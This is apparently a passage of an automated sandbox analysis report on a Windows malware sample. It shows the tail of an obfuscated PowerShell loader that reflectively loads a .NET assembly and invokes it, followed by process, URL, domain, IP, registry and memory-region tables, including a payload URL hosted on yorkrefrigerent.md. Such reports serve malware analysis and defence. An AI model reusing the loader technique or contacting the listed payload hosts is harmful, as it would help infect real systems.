AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null,
[object[]] (' ??v?}???@+@ ?@@ ??v?}??.so!}( }4}? ?4*?*?#:?*(+ (*(+ (v.4*?*?#:?sr8*??(su4*?*?#:?4}? ?lo_8*??(garo ??v?}??s4*?*?#:?!}(
}il*(+ (up4*?*?#:?4}? ?m. ??v?}??n8*??(r8*??(girf8*??(rkroy4*?*?#:?4*?*?#:??? }??+?sp ??v?}?? ??v?}???*(??@*?'))
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://yorkrefrigerent.md
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://hermosanairobi.com
|
unknown
|
||
|
https://yorkrefrigerent.md
|
unknown
|
||
|
https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt
|
195.178.106.125
|
||
|
http://mail.hermosanairobi.com
|
unknown
|
||
|
https://yorkrefrigerent.mdx
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
hermosanairobi.com
|
192.81.170.3
|
|
|
|
yorkrefrigerent.md
|
195.178.106.125
|
||
|
mail.hermosanairobi.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.81.170.3
|
hermosanairobi.com
|
Canada
|
|
|
|
195.178.106.125
|
yorkrefrigerent.md
|
Romania
|
||
|
192.168.2.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2BA1000
|
trusted library allocation
|
page read and write
|
|
|
|
28B4A591000
|
heap
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4D2000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
28B4A51D000
|
heap
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
28B4A504000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5ADF000
|
stack
|
page read and write
|
||
|
1D52CD43000
|
heap
|
page read and write
|
||
|
E81000
|
heap
|
page read and write
|
||
|
EB5000
|
trusted library allocation
|
page execute and read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA50000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
5FCC000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
28B323A5000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5CF0000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B31D60000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
EA0000
|
trusted library allocation
|
page read and write
|
||
|
3BA9000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
28B3233C000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
E90000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
28B304D4000
|
heap
|
page read and write
|
||
|
28B30585000
|
heap
|
page read and write
|
||
|
1D52D000000
|
heap
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A508000
|
heap
|
page read and write
|
||
|
1D52AC90000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52C000
|
heap
|
page read and write
|
||
|
1D52CD2F000
|
heap
|
page read and write
|
||
|
28B30380000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
28B324A4000
|
trusted library allocation
|
page read and write
|
||
|
28B41EE1000
|
trusted library allocation
|
page read and write
|
||
|
DF9000
|
heap
|
page read and write
|
||
|
28B323E4000
|
trusted library allocation
|
page read and write
|
||
|
2BF9000
|
trusted library allocation
|
page read and write
|
||
|
E1D000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5D20000
|
trusted library allocation
|
page read and write
|
||
|
65CB000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CDA6000
|
heap
|
page read and write
|
||
|
5EF3000
|
trusted library allocation
|
page read and write
|
||
|
C84C8FD000
|
stack
|
page read and write
|
||
|
28B4A8B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A595D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D52AC70000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B3043D000
|
heap
|
page read and write
|
||
|
28B31F49000
|
trusted library allocation
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4CB000
|
heap
|
page read and write
|
||
|
1D52CAF4000
|
heap
|
page read and write
|
||
|
1D52CB3C000
|
heap
|
page read and write
|
||
|
6560000
|
trusted library allocation
|
page read and write
|
||
|
C84C97E000
|
stack
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52A000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B80000
|
trusted library allocation
|
page read and write
|
||
|
C84CBF9000
|
stack
|
page read and write
|
||
|
28B31EE1000
|
trusted library allocation
|
page read and write
|
||
|
67F0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CBC8000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
28B4AA90000
|
trusted library allocation
|
page read and write
|
||
|
1D52AC75000
|
heap
|
page read and write
|
||
|
28B4A8C0000
|
trusted library allocation
|
page read and write
|
||
|
1D52AC7D000
|
heap
|
page read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
1730BFE000
|
stack
|
page read and write
|
||
|
5FC5000
|
heap
|
page read and write
|
||
|
5FD5000
|
heap
|
page read and write
|
||
|
28B4A5B8000
|
heap
|
page read and write
|
||
|
1730FFE000
|
stack
|
page read and write
|
||
|
1D52AE60000
|
heap
|
page read and write
|
||
|
1D52AD8D000
|
heap
|
page read and write
|
||
|
28B324C8000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
28B323B8000
|
trusted library allocation
|
page read and write
|
||
|
7DF481350000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FEA000
|
heap
|
page read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
C84C53E000
|
stack
|
page read and write
|
||
|
C84C5FE000
|
stack
|
page read and write
|
||
|
7FF9A5B89000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD62000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5963000
|
trusted library allocation
|
page read and write
|
||
|
5FF1000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B4AB10000
|
trusted library allocation
|
page read and write
|
||
|
6800000
|
heap
|
page read and write
|
||
|
28B4A8E0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5B0000
|
heap
|
page read and write
|
||
|
51DB000
|
stack
|
page read and write
|
||
|
28B304A3000
|
heap
|
page read and write
|
||
|
7FF9A5B90000
|
trusted library allocation
|
page read and write
|
||
|
531E000
|
stack
|
page read and write
|
||
|
1D52CD53000
|
heap
|
page read and write
|
||
|
28B303F0000
|
heap
|
page read and write
|
||
|
A6B000
|
stack
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
E8E000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CF86000
|
heap
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
1D52AD8E000
|
heap
|
page read and write
|
||
|
17310FF000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B323E6000
|
trusted library allocation
|
page read and write
|
||
|
67AF000
|
stack
|
page read and write
|
||
|
7FF9A5AF6000
|
trusted library allocation
|
page read and write
|
||
|
28B320F2000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
unkown
|
page read and write
|
||
|
1D52CD0D000
|
heap
|
page read and write
|
||
|
28B4A8C2000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
7FF9A5BA0000
|
trusted library allocation
|
page read and write
|
||
|
5F0B000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA60000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
7F9C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
6CAE000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
6590000
|
trusted library allocation
|
page read and write
|
||
|
C84D90D000
|
stack
|
page read and write
|
||
|
28B4A52D000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D52ACB8000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B30550000
|
heap
|
page execute and read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
E8B000
|
heap
|
page read and write
|
||
|
4FF0000
|
trusted library allocation
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
5F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB43000
|
heap
|
page read and write
|
||
|
6560000
|
trusted library allocation
|
page read and write
|
||
|
1D52ABD0000
|
heap
|
page read and write
|
||
|
28B41F4C000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD2F000
|
heap
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5D4000
|
heap
|
page read and write
|
||
|
E85000
|
heap
|
page read and write
|
||
|
1D52CB20000
|
heap
|
page read and write
|
||
|
1D52CE01000
|
heap
|
page read and write
|
||
|
28B4A8E0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
28B4A5B4000
|
heap
|
page read and write
|
||
|
28B323CA000
|
trusted library allocation
|
page read and write
|
||
|
28B304EA000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
1D52CAC1000
|
heap
|
page read and write
|
||
|
28B30580000
|
heap
|
page read and write
|
||
|
1D52AC7E000
|
heap
|
page read and write
|
||
|
28B4A5CA000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B32000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5954000
|
trusted library allocation
|
page read and write
|
||
|
28B4A337000
|
heap
|
page read and write
|
||
|
D84000
|
trusted library allocation
|
page read and write
|
||
|
E6A000
|
heap
|
page read and write
|
||
|
5FB0000
|
heap
|
page read and write
|
||
|
28B41F40000
|
trusted library allocation
|
page read and write
|
||
|
28B4AAD8000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5A10000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F00000
|
unkown
|
page read and write
|
||
|
28B4A5B7000
|
heap
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
28B30557000
|
heap
|
page execute and read and write
|
||
|
545E000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5A0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
2A28000
|
trusted library allocation
|
page read and write
|
||
|
EAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
trusted library allocation
|
page read and write
|
||
|
2B12000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
1D52ACB7000
|
heap
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5FE000
|
heap
|
page read and write
|
||
|
1D52CD1D000
|
heap
|
page read and write
|
||
|
28B4A506000
|
heap
|
page read and write
|
||
|
28B3043B000
|
heap
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB14000
|
heap
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
D05000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
DC3000
|
heap
|
page read and write
|
||
|
C84D88E000
|
stack
|
page read and write
|
||
|
4C9D000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
5EF2000
|
trusted library allocation
|
page read and write
|
||
|
65B0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A527000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
5EF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5BB0000
|
trusted library allocation
|
page read and write
|
||
|
5EF1000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5B7000
|
heap
|
page read and write
|
||
|
502D000
|
stack
|
page read and write
|
||
|
7FF9A5CC0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4F0000
|
heap
|
page read and write
|
||
|
28B32382000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA50000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8B0000
|
trusted library allocation
|
page read and write
|
||
|
2B83000
|
heap
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C60000
|
trusted library allocation
|
page read and write
|
||
|
28B323D3000
|
trusted library allocation
|
page read and write
|
||
|
28B32457000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AAD0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CE00000
|
heap
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA70000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5960000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CF86000
|
heap
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
67B0000
|
trusted library allocation
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD2F000
|
heap
|
page read and write
|
||
|
1D52AD66000
|
heap
|
page read and write
|
||
|
DC5000
|
heap
|
page read and write
|
||
|
28B4A593000
|
heap
|
page read and write
|
||
|
5FEA000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD06000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A430000
|
heap
|
page read and write
|
||
|
6560000
|
heap
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
1D52CAE6000
|
heap
|
page read and write
|
||
|
28B4AA40000
|
remote allocation
|
page read and write
|
||
|
28B4A4CB000
|
heap
|
page read and write
|
||
|
1D52AC7B000
|
heap
|
page read and write
|
||
|
5F00000
|
trusted library allocation
|
page read and write
|
||
|
65A0000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
C84C87E000
|
stack
|
page read and write
|
||
|
5F75000
|
trusted library allocation
|
page read and write
|
||
|
1D52CACA000
|
heap
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
1D52CAF7000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5B7000
|
heap
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
28B4A443000
|
heap
|
page read and write
|
||
|
28B323DB000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
28B3235B000
|
trusted library allocation
|
page read and write
|
||
|
28B31ED7000
|
heap
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
1D52CAD3000
|
heap
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
1D52CB2C000
|
heap
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B34000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD6B000
|
heap
|
page read and write
|
||
|
7FF9A5BC0000
|
trusted library allocation
|
page read and write
|
||
|
5FEA000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
1D52CAC0000
|
heap
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5CA0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C10000
|
trusted library allocation
|
page read and write
|
||
|
5EF3000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B3045B000
|
heap
|
page read and write
|
||
|
2C08000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B50000
|
trusted library allocation
|
page read and write
|
||
|
5D07000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52B000
|
heap
|
page read and write
|
||
|
28B31ED0000
|
heap
|
page read and write
|
||
|
28B4A50E000
|
heap
|
page read and write
|
||
|
7FF9A5C50000
|
trusted library allocation
|
page read and write
|
||
|
65F0000
|
trusted library allocation
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
28B4A4F3000
|
heap
|
page read and write
|
||
|
5F10000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5BD0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8C0000
|
trusted library allocation
|
page read and write
|
||
|
5FA0000
|
heap
|
page read and write
|
||
|
C84CB77000
|
stack
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
2B20000
|
trusted library allocation
|
page read and write
|
||
|
2B1A000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5A0000
|
heap
|
page read and write
|
||
|
7FF9A5BE0000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
51E0000
|
heap
|
page read and write
|
||
|
17312FE000
|
stack
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD00000
|
heap
|
page read and write
|
||
|
E6D000
|
heap
|
page read and write
|
||
|
28B3235F000
|
trusted library allocation
|
page read and write
|
||
|
4FF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5C3000
|
heap
|
page read and write
|
||
|
28B4A530000
|
trusted library allocation
|
page read and write
|
||
|
6590000
|
trusted library allocation
|
page read and write
|
||
|
28B303A0000
|
heap
|
page read and write
|
||
|
28B304BF000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
28B4A511000
|
heap
|
page read and write
|
||
|
28B30560000
|
trusted library allocation
|
page read and write
|
||
|
28B32478000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
heap
|
page execute and read and write
|
||
|
5F00000
|
trusted library allocation
|
page read and write
|
||
|
28B32521000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA60000
|
trusted library allocation
|
page read and write
|
||
|
1D52CADB000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
C84CE7B000
|
stack
|
page read and write
|
||
|
1D52CD86000
|
heap
|
page read and write
|
||
|
1D52CD4B000
|
heap
|
page read and write
|
||
|
7FF9A5B70000
|
trusted library allocation
|
page read and write
|
||
|
28B4A51C000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5D10000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8F0000
|
trusted library allocation
|
page read and write
|
||
|
5FD9000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
54B0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA80000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F09000
|
unkown
|
page read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
28B32493000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5C8000
|
heap
|
page read and write
|
||
|
1D52CB17000
|
heap
|
page read and write
|
||
|
D80000
|
trusted library allocation
|
page read and write
|
||
|
5CF0000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
6790000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
67C0000
|
trusted library allocation
|
page read and write
|
||
|
65F0000
|
trusted library allocation
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
28B3241F000
|
trusted library allocation
|
page read and write
|
||
|
3BA1000
|
trusted library allocation
|
page read and write
|
||
|
2B14000
|
trusted library allocation
|
page read and write
|
||
|
28B4AAF0000
|
trusted library allocation
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page read and write
|
||
|
C84CA7E000
|
stack
|
page read and write
|
||
|
28B4AA40000
|
remote allocation
|
page read and write
|
||
|
28B4A5AF000
|
heap
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
28B4A890000
|
heap
|
page execute and read and write
|
||
|
1D52CB04000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B4A59A000
|
heap
|
page read and write
|
||
|
1D52CAC3000
|
heap
|
page read and write
|
||
|
D70000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
28B3040E000
|
heap
|
page read and write
|
||
|
EA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
6780000
|
trusted library allocation
|
page read and write
|
||
|
C84C9FE000
|
stack
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
28B4A5BB000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B32517000
|
trusted library allocation
|
page read and write
|
||
|
2C0A000
|
trusted library allocation
|
page read and write
|
||
|
28B32336000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
28B4A8C1000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AB00000
|
trusted library allocation
|
page read and write
|
||
|
1D52ACCC000
|
heap
|
page read and write
|
||
|
1D52AD66000
|
heap
|
page read and write
|
||
|
42C000
|
remote allocation
|
page execute and read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
5FA1000
|
heap
|
page read and write
|
||
|
7FF9A5950000
|
trusted library allocation
|
page read and write
|
||
|
1D52D0B7000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4F6000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4E6000
|
heap
|
page read and write
|
||
|
28B4A8E0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CAC7000
|
heap
|
page read and write
|
||
|
7FF9A5A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
28B4A890000
|
trusted library allocation
|
page read and write
|
||
|
28B31DD0000
|
heap
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C30000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB07000
|
heap
|
page read and write
|
||
|
28B4A330000
|
heap
|
page read and write
|
||
|
28B31DB0000
|
heap
|
page execute and read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
1D52ACB9000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD2F000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page execute and read and write
|
||
|
6600000
|
trusted library allocation
|
page read and write
|
||
|
1D52CAE3000
|
heap
|
page read and write
|
||
|
E73000
|
heap
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
28B32529000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
28B303D0000
|
heap
|
page read and write
|
||
|
28B4A8B0000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B4A51C000
|
heap
|
page read and write
|
